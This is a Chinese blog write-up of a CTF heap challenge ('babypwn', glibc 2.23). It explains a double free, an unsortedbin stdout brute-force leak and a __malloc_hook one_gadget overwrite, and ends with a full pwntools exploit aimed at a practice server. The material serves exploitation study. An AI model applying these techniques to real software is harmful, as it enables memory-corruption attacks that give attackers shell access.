ycb2020babypwn(unsortedbin爆破stdout泄露)

最新推荐文章于 2024-07-10 08:51:49 发布
最新推荐文章于 2024-07-10 08:51:49 发布
阅读量342 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33590156/article/details/121716753
版权

题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞

在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法

然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。

操作

首先肯定是double free去改写堆上的fd指针拿到改写的fake chunk,这里是chunk0是被操作的chunk,chunk5是我们的fake chunk用来控制0,chunk6是专门用来垫小chunk的。

所以我们的思路就是,

free(6)#送小chunk
free(5)
add(0x60,p64(0)+p64(0xa1),'\x00')#释放再申请5,就是编辑5,来改写0,去做到任意地址写

失误1

我们的想法肯定首先要把0送到unsortedbin中,然后爆破改写他的fd的低2字节,

所以本来在拿到5的第一时刻就将0的size改写为0xa1,并free(0)进入unsortrdbin,然后edit(5)去改写0的size为0x71,和fd,但会发现写完之后其实是没办法申请出来stdout的。

失误1纠正

所以正确的思路第一次拿到5的时候不改0的size,先free(0)到fastbin中,然后edit(5)一次将0的size改为0xa1,再free(0),这次0就会同时存在在unsortedbin和fastbin中,

接下来就可以去修改0 的size为0x71,fd为stdout-0x43了

失误2

爆破拿到stdout-0x43后,我直接进行

add(0x60,'\x00'*0x33+p64(0xfbad1800)+p64(0)*3+'\x58','\xaa'*0x10)

修改stdout

但是我发现,程序会卡在打出libc之后,

失误2纠正

应该是因为在add中,在输入完chunk内容后就会打出libc,但是add在这之后还有第三个输入,所以会和recvlibc冲突,导致程序卡住,所以这里要一句句输入,在第二个输入后就recvlibc,在进行第三个输入。

最后,还是edit 0 指向mallochook,打ogg

exp

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
def Local(LOCAL):
	if LOCAL == 1:
		p = process('./pwn')
	else:
		p = remote("node4.buuoj.cn",28965)
	return p

def Libc(LIBC):
	if LIBC == 2.23:
		libc = ELF('/home/hacker/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
	elif LIBC == 2.24:
		libc = ELF("/home/hacker/glibc-all-in-one/libs/2.24-3ubuntu1_amd64/libc-2.24.so")
	elif LIBC == 2.26:
		libc = ELF("/home/hacker/glibc-all-in-one/libs/2.26-0ubuntu2.1_amd64/libc-2.26.so")
	elif LIBC == 2.27:
		#libc = ELF("/home/hacker/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so")#1
		libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")#1.2
		#libc = ELF("/home/hacker/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so")#1.4
	elif LIBC == 2.29:
		libc = ELF("/home/hacker/glibc-all-in-one/libs/2.29-0ubuntu2_amd64/libc-2.29.so")
	elif LIBC == 2.30:
		libc = ELF("/home/hacker/glibc-all-in-one/libs/2.30-0ubuntu2_amd64/libc-2.30.so")
		#libc = ELF("/home/hacker/glibc-all-in-one/libs/2.30-0ubuntu2.2_amd64/libc-2.30.so")
	elif LIBC == 2.31:
		#libc = ELF("/home/hacker/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so")#9
		libc = ELF("/home/hacker/glibc-all-in-one/libs/2.24-0ubuntu9.2_amd64/libc-2.31.so")#9.2
	elif LIBC == 0:#remote
		libc = ELF('./libc-2.23.so')
	return libc

################### exp ####################
def menu(idx):
	p.sendlineafter("Your choice : ",str(idx))

def add(size,con,msg):
	menu(1)
	p.sendlineafter("size of the game's name: \n",str(int(size)))
	p.sendafter("game's name:\n",con)
	p.sendlineafter("game's message:\n",msg)

def free(idx):
	menu(2)
	p.sendlineafter("index:\n",str(idx))


def exp(p):
#double free
	add(0x60,'\xaa',p64(0)+p64(0x71))#0
	add(0x60,'\xaa','\x01'*0x10)#1
	free(0)
	free(1)
	free(0)

#get 4 to get controled chunk
	add(0x60,'\x20','\x00')#2 0
	add(0x60,'\x00','\x01')#3 1
	add(0x60,'\x00'*0x58+p64(0x41),'\x00')#4 0

	add(0x60,p64(0)+p64(0x71),'\x00')#5 controling

#prepare 0x20 chunk	for edit
	add(0x20,'\xaa','\x00')#6

#free 0 into fastbin
	free(0)

#edit
#change 0 size
	free(6)#0x20
	free(5)
	add(0x60,p64(0)+p64(0xa1),'\x00')#7 0 5

#free 0 into unsortedbin
	free(0)

#edit
#change 0 size and fd to stdout-0x43 
	free(6)#0x20
	free(5)
	add(0x60,p64(0)+p64(0x71)+'\xdd'+'\xc5','\x00')#7 0 5

#get stdout-0x43	
	free(6)
	add(0x60,'\x00','\x00')
	free(6)

#add(0x60,'\x00'*0x33+p64(0xfbad1800)+p64(0)*3+'\x58','\xaa'*0x10)
	menu(1)
	p.sendlineafter("size of the game's name: \n",str(int(0x60)))
	p.sendafter("game's name:\n",'\x00'*0x33+p64(0xfbad1887)+p64(0)*3+'\x58')

#leak libc
	libc_base = u64(p.recv(6).ljust(8,'\x00'))-0x3c56a3
	log.info("libc_base = "+hex(libc_base))

	p.sendlineafter("game's message:\n",'\xaa'*0x10)
	
#get malloc_hook
	malloc_hook = libc_base + libc.sym["__malloc_hook"]
	realloc = libc_base + libc.sym["realloc"]
	ogg = libc_base + 0x4526a

	free(0)
	#edit
	free(6)#0x20
	free(5)
	add(0x60,p64(0)+p64(0x71)+p64(malloc_hook-0x23),'\x00')#7 0 5
	
	free(6)
	add(0x60,'a','b')
	free(6)
	add(0x60,'\x00'*(0x13-0x8)+p64(ogg)+p64(realloc+0xd),'a')

	menu(1)
	p.sendline("cat flag")
	#gdb.attach(p)
	
	p.interactive()




if __name__ == '__main__':
	elf = ELF("./pwn")
	while True:
		try:
			LOCAL = 0
			LIBC = 0

			p = Local(LOCAL)
			libc = Libc(LIBC)
	
			exp(p)
		except:
			#sleep(1)
			p.close()
Wust-Mo0n5ea丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
新姿势GET 通过unsorted bin泄露libc地址 与 fastbin double free
哒君的博客
08-01 1955
源文件 GitHub checksec 初步分析 利用方法 用sentence函数分配small bin大小的bin,将其free以后,会归入unsorted bin,而如果只有一个bin的话,其fd与bk都是main_arena + offset,尽管free以后内容会清0,但是search函数中的memcmp却可以通过使v1为\x00来绕过,这样的话就会打印出bin的fb字...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
2022羊城杯pwn wp
N1rvana的博客
09-04 862
2022羊城杯pwn
Magic_Book(stdout泄露地址)
FUCKING12的博客
11-03 191
箭头所指的chunk在tcachebins和unsortedbin里面,同时unsortdbin里面还有main_arena+96的地址和堆地址,我们可以利用这2个残余地址来爆破stdout。首先是分别改了这2处的2字节,这么改的目的是:可以将chunk分配到stdout附近,然后就可以修改stdout里面的数据,来泄露地址。tcachebins是不检查你的size的,所以可以随便利用其分配到你想要的地址去。因为我们没有show函数无法泄露地址,所以我们需要打stdout泄露地址。
[uaf + off by one -> stdout leak libc] 长城杯pwn1
huzai9527的博客
09-22 432
1. ida分析 存在uaf 和 off by one,可以实现任意地址写 没有show函数,且保护全开,不能修改got表 2. 思路 使用stdout爆破,泄漏libc 先申请几个chunk,通过off by one,构造chunk lapping 再通过uaf修改fd,构成任意地址写 注意点就是,想法设法构造chunk复用 uaf + off by one 总结一下就是,先del构造fastbin,再改chunk head构造unstored bin,再申请一个不是fastbin大小的chunk覆
[BUUCTF]PWN——[V&N2020 公开赛]babybabypwn
mcmuyanga的博客
11-28 602
[V&N2020 公开赛]babybabypwn 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看程序的大概情况 64位ida载入,看一下main函数 sub_1202()函数,沙盒的限制条件 用seccomp-tools看一下 其他禁用的指令是干什么的我不是很清楚,但是禁用了execve(系统调用),也就没办法获取shell权限了,只能够想办法通过open–>read–>write的方式来获取flag的值了 sub_1347()函数
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 693
bjdctf_2020_babyrop
2020YCBCTF:2020羊城杯官方writeup及
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
YCB_video_dataset.txt
12-25
深度学习数据集YCB_video_dataset,国外网站下载速度感人,网盘资源下载更快。
YCB_Video_toolbox:YCB视频数据集的工具箱
04-30
它提供了来自YCB数据集中21个对象的准确6D姿势,这些姿势在92个视频中以133,827帧被观察到。执照YCB视频数据集是根据MIT许可证发布的(有关详细信息,请参阅LICENSE文件)。引用如果您发现我们的数据集对您的研究...
多维度配置库YCB.zip
07-16
YCB 是一个多维度配置库,它能从资源文件中建立包,来描述各种数值。此库可以让基于多维度的应用程序通过配置自己来描述位置、语言、环境等。示例代码:var YCB = require('ycb'); var configArray = [  { ...
长城电器YCB200变频器说明书.pdf
10-09
长城电器YCB200变频器说明书pdf,长城电器YCB200变频器说明书
羊城杯_2020_babyre 题解
lifanxin的博客
09-09 1126
babyre题目信息考查知识题目分析WP脚本总结 题目信息   本题目来自于2020年羊城杯的逆向题,可以在buuoj上找到题目复现。 考查知识   本题目考查的知识点有:DES/AES算法,SMC自修改代码,以及合理利用动态调试来快速解题。   关于动态调试,这里很多人可能会遇到环境问题,主要是因为题目调用了openssl的动态加密算法库,所以本地也得有一个。同时还需要注意openssl加密算法库的版本问题,该题目必须使用libcrypto.so.1.0.0。这里我给出该算法库文件 – libcrypto
2021 长城杯 pwn K1ng_in_h3Ap_I
yongbaoii的博客
09-24 356
libc是2.23 菜单 add free 显然是有uaf。 edit 就是输入 输入函数其实还有off by one。 有个后门 我们的思路就是简单的说因为有uaf但是没有show,所以我们就直接攻击stdout,但是又因为后门给了我们地址,所以就解决了爆破这个问题。然后就攻击IO_FILE泄露libc,再攻击malloc_hook就好啦。 第一个exp是利用off by one来构造的。 exp from pwn import * r = process("./pwn1") context.a
水几个pwn
Stella_Leo的博客
08-24 253
author: moqizou 2020-羊城杯-signin 签到题目2.23的glibc add - 最多10个chunk然后会malloc(0x28)之后就是namesize结构体如下 0x10 chunk 头 0x8 1 inuse位置 0x8 buf->name_chunk 0x8 23字节的message 0x8 看上面可以溢出 然后会把该chunk指针 存入全局table view 通过判断inuse输出name和message del uaf,只清除chunk_table和name.
巅峰极客pwn wp
N1rvana的博客
08-17 724
2022巅峰极客pwn wp
DSCTF pwn 部分wp
N1rvana的博客
07-15 631
DSCTF pwn wp
[V&N2020 公开赛]babybabypwn (SROP和orw)
carol2358的博客
05-30 1054
本题使用了SROP和orw来获得flag 第一个函数是缓冲区,第二个函数是沙盒,第三个函数是漏洞所在 沙盒把59禁了,那就是exceve不能用了 这里syscall的参数是15,那就是SigreturnFrame,那我们就用SROP SROP可以使用pwntool自带的工具 SROP的使用条件: 需要注意的是,我们在构造ROP攻击的时候,需要满足下面的条件 可以通过栈溢出来控制栈的内容 需要知道相应的地址 “/bin/sh” Signal Frame syscal sigreturn 需要有够大的
移动互联安全扩展要求测评项
最新发布
hakksjss的博客
07-10 1041
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
ycb video数据集 训练
01-03
YCB视频数据集是一个用于目标检测和姿态估计的计算机视觉数据集。该数据集包含由六个工业机器人在不同环境中拍摄的视频序列,这些视频中包含了21个不同种类的物体,并提供了物体的2D和3D姿态信息。 要对YCB视频数据集进行训练,我们需要首先下载并解压数据集文件。随后,我们可以使用基于深度学习的目标检测算法,如SSD或Faster R-CNN,来构建一个针对YCB视频数据集的训练模型。 在训练过程中,我们可以利用数据集中提供的2D姿态信息,将其与物体的真实位置和姿态进行匹配,以提高模型的准确度和精度。此外,还可以将数据集中的图像和姿态信息用于模型的数据增强,例如旋转、平移和缩放等操作,进一步增加训练样本的多样性和丰富性。 在训练模型时,我们可以使用一些常见的深度学习框架,如TensorFlow或PyTorch。通过设置合适的超参数和网络结构,以及适当的损失函数和优化方法,我们可以训练出一个在YCB视频数据集上具有较高准确度的目标检测和姿态估计模型。 最后,在训练完成后,我们可以使用测试集对模型进行评估,并根据评估结果进行模型调优和改进。同时,还可以将训练得到的模型应用于实际的目标检测和姿态估计任务中,例如机器人操作和自动化控制等领域。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值